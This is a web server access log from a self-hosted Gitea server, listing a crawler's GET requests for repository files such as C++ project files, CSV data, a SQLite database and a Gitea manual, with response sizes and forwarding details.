[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" +[17/Feb/2026:14:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71398] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" +[17/Feb/2026:14:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" +[17/Feb/2026:14:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" +[17/Feb/2026:14:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15789] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" +[17/Feb/2026:14:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" +[17/Feb/2026:14:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" +[17/Feb/2026:14:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11105] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" +[17/Feb/2026:14:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" +[17/Feb/2026:14:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" +[17/Feb/2026:14:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:14:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" +[17/Feb/2026:14:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:14:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" +[17/Feb/2026:14:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:14:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:14:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10454] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:14:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" +[17/Feb/2026:14:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" +[17/Feb/2026:14:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:14:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17348] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:14:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17352] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:14:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17352] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:14:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" +[17/Feb/2026:14:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:14:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17321] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:14:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:14:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" +[17/Feb/2026:14:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:14:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:14:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 